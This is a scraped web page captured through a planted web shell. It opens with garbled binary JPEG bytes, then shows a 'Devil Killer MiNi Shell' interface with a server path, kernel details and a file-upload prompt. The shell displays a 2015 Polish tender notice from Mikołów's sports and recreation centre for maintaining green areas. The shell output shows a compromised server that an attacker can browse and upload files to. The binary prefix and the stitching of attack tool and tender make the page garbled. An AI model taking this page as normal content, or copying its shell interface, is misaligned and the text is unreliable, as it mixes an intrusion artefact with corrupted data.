JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150326/42767-N-2015.html

<p class="kh_header"><b>Mikołów: Utrzymanie i pielęgnacja terenów zieleni na terenie obiektów administrowanych przez Miejski Ośrodek Sportu i Rekreacji w Mikołowie</b><br>
<b>Numer ogłoszenia: 42767 - 2015; data zamieszczenia: 26.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji w Mikołowie , ul. Konstytucji 3 Maja 31, 43-190 Mikołów, woj. śląskie, tel. 32 779 76 03, faks 32 779 76 03 wew. 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.mikolow.eu; www.mikolow.bip.gmin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i pielęgnacja terenów zieleni na terenie obiektów administrowanych przez Miejski Ośrodek Sportu i Rekreacji w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część -I CEPiE ŚOB:Utrzymanie i pielęgnacja terenów zieleni w obszarze: teren od bramy głównej do szlabanu wjazdowego, tereny zieleni wokół parkingów,  pas zieleni szerokości ok. 1m wzdłuż istniejącego ogrodzenia z siatki wokół Centrum Edukacji Przyrodniczej  i  Ekologicznej tj. o powierzchni  ok. 1,2 ha 
Szczegółowy zakres przedmiotu zamówienia  
Zakres prac pielęgnacyjnych obejmuje następujące czynności :Koszenie terenów na terenach kolekcji roślin. Wykonawca zobowiązany jest do wykaszania terenów o pow. 9,25 ha wg charakterystyki wyszczególnionych poniżej:
Kolekcja Drzewa i krzewy liściaste - 5 ha - 1 x w miesiącu; 
Kolekcja Drzewa i krzewy iglaste - 1,5 ha-1 x w miesiącu;
Ogród fenologiczny - 0,25 ha-1 x w miesiącu;
Kolekcja różaneczników - 1 ha - 1 x w miesiącu;
Kolekcja bór sosnowy - 1,5 ha - 1 x w miesiącu.
Koszenie odbywać się będzie w ilościach podanych wyżej, jednak nie więcej niż 5 razy w trakcie trwania umowy.      
Koszenie terenów zieleni od bramy do szlabanu, terenów zieleni wokół parkingów oraz pasa szerokości 1 m wzdłuż ogrodzenia CEPiE. 
Koszenie - 2 razy w trakcie trwania umowy.
Wykonawca zobowiązany jest do wykaszania terenów zieleni  w obszarze: teren od bramy głównej do szlabanu wjazdowego, tereny zieleni wokół parkingów, pas zieleni szerokości ok 1m wzdłuż istniejącego ogrodzenia z siatki wokół Centrum Edukacji Przyrodniczej   i  Ekologicznej tj. o powierzchni  ok 1,2 ha 
Prace  w Kolekcji ogród wodny1 x w trakcie trwania umowy.
Prace wokół zbiornika wodnego polegające na wykaszaniu terenu o powierzchni 400 m2 Wykonawca wykona w sposób gwarantujący swobodny dostęp do zbiornika. 
Prace w zbiorniku wodnym o powierzchni 1800 m2 polegające na usunięciu nadmiaru roślin niepożądanych wskazanych przez przedstawiciela Zamawiającego Wykonawca wykona w sposób gwarantujący estetyczny wygląd zbiornika. Wyrwane rośliny w ok. 4,5 m3 Wykonawca odwiezie w miejsce wskazane przez Zamawiającego na odległość do 3 km.mWywóz odpadów organicznych powstałych w trakcie prac w miejsce wskazane przez Zamawiającego  
W przypadku konieczności jeden raz w trakcie trwania Umowy  Wykonawca wywiezie zgromadzone odpady organiczne takie jak spryzmowane chwasty, trawę, świeże gałęzie  z terenu CEPIE ŚOB.
Koszty wywozu i utylizacji poniesie Wykonawca. Szacowana ilość - jednorazowo 6 ton/ 4,5 m3 . 
Część II - CEPiE OGRÓD: Zakres usług pielęgnacyjnych obejmuje utrzymanie i pielęgnację terenów zieleni zlokalizowanych na terenie działek m.in. 497/9, 658/152 i innych zlokalizowanych przy ul. 15 Grudnia w Mikołowie
Szczegółowy zakres przedmiotu zamówienia  
Zakres prac pielęgnacyjnych obejmuje następujące czynności:
Wywóz odpadów z utylizacją
Odpady organiczne powstałe w trakcie 3 krotnego pielenia (zakres pielenia ogrodu kwiatowego, tarasowego, traw ozdobnych i drzew wykonany bezpośrednio przez Zamawiającego) w ilości jednorazowo 4,5m3 Wykonawca zobowiązany będzie usuwać na bieżąco z terenu obiektu.
Załadunek i utylizacja odpadów organicznych leży w gestii Wykonawcy.
Koszenie terenów zieleni
Wykonawca zobowiązany jest do  wykaszania terenów zieleni o pow. ok. 12,7 ha z częstotliwością 1 raz  w miesiącu.  Skoszoną trawę z terenu wskazanego przez przedstawiciela Zamawiającego o  powierzchni 3 ha Wykonawca zobowiązany jest usunąć  z terenu obiektu. 
Skoszona trawa z pozostałych powierzchni nie wymaga wywiezienia. Szacowana ilość skoszonej trawy podlegająca wywozowi w okresie miesiąca to 12,5 m3 (dla 1krotnego koszenia).Na terenach łąki kwietnej oraz murawy kserotermicznej Wykonawca  wykona  1 raz  w miesiącu wykoszenia pasa o szerokości  1 metra wzdłuż alejek spacerowych o długości 320 mb.Wykonawca wykosi  1 raz w miesiącu pas szerokości 1,0 metra wokół ogrodzenia zewnętrznego z paneli stalowych z cokolikiem prefabrykowanym betonowym z obu stron o długości 1200 mb  
Powierzchnie terenów zieleni zostały przedstawione w tabeli  wyżej.
Koszenie odbywać się będzie w ilościach podanych wyżej, jednak nie więcej niż 5 razy w trakcie trwania umowy.
Wycinka drzew  1 x w trakcie trwania umowy.
Zakłada się, że w ramach umowy Wykonawca wytnie do 10 szt. drzew o obwodach  pni od 30cm. Do 120 cm. wskazanych przez przedstawiciela Zamawiającego       
Przed przystąpieniem do wycinki drzew uszkodzonych Wykonawca uzyska akceptację przedstawiciela Zamawiającego Ewentualną zgodę na wycinkę drzew uzyska Zamawiający.
Wykonawca zobowiązany jest do wywiezienia pozyskanego drewna, pociętego na odcinki o długości ok 1 mb, oraz konarów, w szacowanej ilości jednorazowo 4,5 m3 na odległość do 3 km w miejsce znajdujące się na terenie CEPIE OGRÓD  wskazane przez przedstawiciela Zamawiającego.
Wykonawca winien dysponować sprzętem do prac na wysokości zwyżka, podnośnik hydrauliczny lub innym sprzętem i pracownikami gwarantującymi skuteczne usunięcie drzew.                  
Prace w Ogrodzie roślin wodnych
Prace w ogrodzie roślin wodnych w zbiornikach o powierzchni 336 m2 polegające na usunięciu nadmiaru roślin niepożądanych wskazanych przez przedstawiciela Zamawiającego Wykonawca wykona  w sposób gwarantujący estetyczny wygląd zbiornika;
W czasie trwania Umowy z częstotliwością 2 razy na tydzień wykonawca wykona prace mające na celu bieżące utrzymanie czystości zbiorników wodnych polegające na usunięciu z powierzchni stawów  zanieczyszczeń takich jak papierki butelki itp.
Do wykonania niezbędnych prac w zbiornikach wodnych Wykonawca winien dysponować sprzętem umożliwiającym bezpieczne wejście do zbiornika. 
W ramach umowy Wykonawca zobowiązany jest również do bieżącego czyszczenia m.in. z glonów itp. dwóch nawodnych pomp napowietrzających .  
Wyrwane rośliny w szacowanej ilości 4,5 m3  Wykonawca wywiezie i zutylizuje z terenu obiektu (odpady organiczne) a pozostałe zanieczyszczenia (odpady komunalne) umieści w kontenerach na odpady komunalne zlokalizowane na terenie obiektu.
Czyszczenie rowu odwadniającego.
Wykonawca wyczyści jeden raz w trakcie trwania umowy rów prowadzący odwodnienie o następujących wymiarach
długość - 210 m;
szerokość - 0,5 m;
głębokość - 0,6 m.
Prace związane z czyszczeniem rowu o powierzchni 357 m2 polegają na usunięciu namułów i chwastów oraz utrzymanie  profilu rowu. W trakcie trwania umowy Wykonawca  obowiązany jest do niezbędnych prac mających na celu utrzymanie drożności rowu. Pozyskany w trakcie prac urobek w szacowanej ilości 18 m3 Wykonawca  na własny koszt wywiezie z terenu obiektu i zutylizuje.
Czyszczenie piecy wapienniczych
Wykonawca jeden  raz w trakcie trwania umowy usunie z  2 szt. piecy wapienniczych porastające je chwasty oraz samosiewy drzew i krzewów (pow. do czyszczenia wraz ze stropem górnym o pow. 800 m2
Zamawiający dopuszcza po uprzedniej konsultacji zastosowanie środków chemicznych.
Niezbędne ilości środków w przypadku czyszczenia chemicznego zapewni Zamawiający.
Część III - Zakres usług pielęgnacyjnych obejmuje utrzymanie i pielęgnację terenów zieleni zlokalizowanych na terenie działek m in. 2161/66 i innych zlokalizowanych przy ul. Żwirki i Wigury 45, ul. Zawilców 8 i 10 w Mikołowie.
Szczegółowy zakres przedmiotu zamówienia 
Zakres prac pielęgnacyjnych obejmuje jeden raz w każdym z wymienionych wyżej miesięcy wykoszenie terenów zieleni w granicach Kompleksu Sportowo Rekreacyjnego, Stadionu miejskiego, boiska wielofunkcyjnego Orlik 2012 o powierzchni ok. 1,7  ha. 
Z zabiegów pielęgnacyjnych wyłączony zostaje obszar dwóch boisk piłkarskich oraz boiska wielofunkcyjnego Moje boisko Orlik 2012. Skoszoną trawę należy pozostawić na terenie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisania sposobu dokonywania oceny spełnienia tego warunku  - dotyczy CZĘŚCI I, II, III</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych - wykonał lub wykonuje, jedną usługę polegającą na utrzymaniu, pielęgnacji terenów zieleni o wartości nie mniejszej niż:
CZĘŚĆ I -  40 000,00 zł brutto 
CZĘŚĆ II - 50 000,00 zł brutto 
CZĘŚĆ III - 5 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisania sposobu dokonywania oceny spełnienia tego warunku - dotyczy CZĘŚCI I, II, III</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu  wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj. :
CZĘŚĆ I - kierownik prac ogrodniczych, posiadający wykształcenie minimum średnie   w zakresie urządzania i pielęgnacji terenów zieleni
CZĘŚĆ II - kierownik prac ogrodniczych, posiadający wykształcenie minimum średnie  w zakresie urządzania i pielęgnacji terenów zieleni,
CZĘŚĆ III - kierownik prac ogrodniczych, posiadający wykształcenie minimum średnie  w zakresie urządzania  i pielęgnacji terenów zieleni, 
UWAGA! Osoby wskazane wyżej, powinny być odrębne dla każdej części.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisania sposobu dokonywania oceny spełnienia tego warunku - dotyczy CZĘŚCI I, II, III</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy - wg załącznika nr 1 do SIWZ
wypełniony kosztorys ofertowy - wg załącznika nr 1.1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadkach:
a)gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa ,pod warunkiem, że będzie dotyczyć zakresu mającego wpływ na realizację przedmiotu zamówienia,
b)zmiany osób, które zgodnie z art. 26 ust 2b ustawy Pzp - będą podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia, w takim przypadku Wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego warunki określone przez Zamawiającego w SIWZ wraz z załączeniem wszystkich wymaganych oświadczeń i dokumentów,
c)zmiany osób prowadzących nadzór nad realizacją umowy ze strony Zamawiającego bądź Wykonawcy,
d)przesunięcia terminów realizacji poszczególnych robót określonych w rozdziale I SIWZ (opis przedmiotu zamówienia), podyktowanych bieżącymi potrzebami pielęgnacyjnymi, czy nieprzewidywalnymi warunkami atmosferycznymi (np. długotrwała susza itp.), w tym Wypadku Zamawiający powiadomi Wykonawcę o zaistniałej zmianie, ustalając kolejny termin realizacji,
2.Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie propozycji Wykonawcy wykazującej zasadność wprowadzenia zmian i zgody Zamawiającego wyrażonej w formie pisemnej na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego.
3.Przewiduje się możliwość zmiany zawartej umowy w stosunku do treści, na podstawie której dokonano wyboru Wykonawcy  w zakresie zmiany wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług (VAT) - wynagrodzenie ulegnie zmianie stosownie  do zmiany stawki podatku bez zmiany wynagrodzenia netto, bez konieczności podpisywania aneksu do umowy, począwszy od daty wejścia w życie powołania zmian.
4.Zmiana umowy dokonana z naruszeniem powyższych postanowień jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolow.eu, www.mikolow.bip.gmin.pl; www.mosir.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Mikołowie
43-190 Mikołów, ul. Konstytucji 3 Maja 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2015 godzina 11:45, miejsce: Miejski Ośrodek Sportu i Rekreacji w Mikołowie
43-190 Mikołów, ul. Konstytucji 3 Maja 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie i pielęgnacja terenów zieleni na terenie Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego (CEPiE ŚOB) w Mikołowie przy Sosnowej 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wielkość i zakres podana w Sekcji II 1.4.
Wymagania dot. realizacji przedmiotu zamówienia przez Wykonawcę.   
Wykonawca zobowiązuje się wykonać usługę  przy użyciu  sprawnie działającego sprzętu i narzędzi zgodnie z obowiązującymi przepisami bezpieczeństwa ppoż., bhp, oraz ochrony środowiska. Parametry sprzętu winne być dostosowane do istniejącej infrastruktury. W przypadku zniszczeń spowodowanych ciężkim sprzętem Wykonawca jest zobowiązany do zastosowania innej technologii oraz przywrócenia zniszczonych terenów do stanu pierwotnego Zamawiający nie przewiduje możliwości magazynowania sprzętu Wykonawcy na terenie CEPIE ŚOB. 
Wykonawca będzie wykonywał usługę w dni powszednie od poniedziałku do piątku    w godzinach od 6.00 do 22.00. W uzasadnionych przypadkach, po uzyskaniu zgody przedstawiciela Zamawiającego dopuszcza się możliwość pracy w soboty i niedziele. Wykonawca ma obowiązek zapewnić taką organizację pracy, która zagwarantuje ciągłe funkcjonowanie obiektu. Wykonawca zobowiązuje się na swój koszt zabezpieczyć miejsce wykonywania prac oraz zapewnić wszelkie warunki bezpieczeństwa. W czasie wykonywania robót  Wykonawca zobowiązany jest do utrzymania terenu prac w stanie wolnym od przeszkód komunikacyjnych oraz będzie na swój koszt usuwał i składował poza terenem wykonywania robót wszelkie urządzenie pomocnicze oraz zbędne materiały i odpady.
W przypadku zaistnienia szkody w przedmiocie umowy jak i mieniu zlokalizowanym na terenie CEPIE ŚOB, Wykonawca zobowiązany jest niezwłocznie powiadomić o tym fakcie Zamawiającego i sporządzić dwustronny protokół na okoliczność zaistniałej szkody.  Wykonawca zobowiązany będzie do przedstawiania comiesięcznych raportów Protokół odbioru z wyliczeniem realizacji usługi stanowiącym iloczyn rzeczywiście wykonanych prac oraz ich ceny jednostkowej przyjętej wg stawek kosztorysu ofertowego stanowiące podstawę rozliczenia pomiędzy Zamawiającym i Wykonawcą. Ww. protokół potwierdzony przez przedstawiciela Wykonawcy i Zamawiającego stanowić będzie podstawę do rozliczenia robót i wypłaty wynagrodzenia jak również określał będzie warunki i terminy usunięcia przez Wykonawcę ewentualnych stwierdzonych wad w miesiącu następnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie i pielęgnacja terenów zieleni na terenie Centrum Edukacji Przyrodniczej i Ekologicznej OGRÓD (CEPiE OGRÓD) w Mikołowie przy ul. 15 Grudnia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wielkość i zakres podana w Sekcji II 1.4.
Wymagania dot. realizacji przedmiotu zamówienia przez Wykonawcę.   
Wykonawca zobowiązuje się wykonać usługę  przy użyciu  sprawnie działającego sprzętu i narzędzi zgodnie z obowiązującymi przepisami bezpieczeństwa ppoż., bhp, oraz ochrony środowiska. Parametry sprzętu winne być dostosowane do istniejącej infrastruktury.
